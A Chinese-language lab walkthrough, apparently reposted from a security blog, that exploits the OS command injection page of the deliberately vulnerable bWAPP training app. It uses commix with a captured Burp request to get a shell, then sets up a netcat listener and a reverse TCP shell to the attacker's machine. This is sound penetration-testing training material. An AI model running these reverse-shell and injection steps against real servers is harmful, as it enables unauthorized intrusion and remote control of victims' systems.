使用Commix和Netcat进行命令注入漏洞攻击

在本文中,我将展示如果严重的OS命令注入漏洞,您可以使用commix工具轻松破解Web服务器。
Attaker:kali Linux
目标:bwapp
此处下载并使用VM ware安装和运行它。
作为浏览器中的攻击者浏览器目标IP :192.168.0.105/bwapp,现在使用bee登录:bug作为凭证并从选择您的错误中选择OS命令注入 ; 然后单击的黑客
使用Commix和Netcat进行命令注入漏洞攻击
这里请求的网页打开,您可以在其中执行任何命令。现在我将启动burp suite来捕获请求。要开始拦截,请单击代理选项卡启用拦截 ; 不要忘记在浏览器中运行代理。现在给像IP的任何命令:192.168.0.105,并单击查找
使用Commix和Netcat进行命令注入漏洞攻击
在Burp套件中,您将获得已发布的邮件请求。在这里,我们有受害者的详细信息,这将有助于对其Web服务器进行攻击。现在从POST中选择整个数据POST…….&form=submit然后将其复制保存在文本文件中。我已将其保存为os.txt并进一步将其与commix一起使用。
使用Commix和Netcat进行命令注入漏洞攻击
之前的教程中,我们使用了手动步骤在commix中执行给定的命令以进行攻击,但这里的步骤更容易和方便申请进行攻击。现在键入以下命令以使commix开始攻击。
commix r /root/Desktop/os.txt


点击输入按Y作为每个问题的回复。
从给定的屏幕截图中你可以看到我有受害者的shell,在这里我执行了以下命令来检索受害者的详细信息。
whoami

id

使用Commix和Netcat进行命令注入漏洞攻击
在下一步中,我尝试将受害者与netcat shell连接起来; 打开其他终端并输入以下命令通过netcat启动监听器:nc -lvp 4444
现在使用netcat通过commix启动反向tcp连接,并按照以下步骤操作。


commix(os_shell) > reverse_tcp
commix(reverse_tcp) > set LHOST 192.168.0.104
commix(reverse_tcp) > set LPORT 4444
选项要求commix为netcat反向TCP shell设置连接类型“1”的后门。
commix(reverse_tcp) > 1


选项通过commix请求将目标类型“1”设置为在目标主机上使用默认netcat。
commix(reverse_tcp) >1
使用Commix和Netcat进行命令注入漏洞攻击
在其他终端上,您将在netcat上再次输入反向连接类型以下命令


whoami
id
在这里,您将看到commix shell和netcat的结果完全相同。
使用Commix和Netcat进行命令注入漏洞攻击
转载请注明本文链接: http://www.mayidui.net/t2330.html
游客
登录后才可以回帖,登录 或者 注册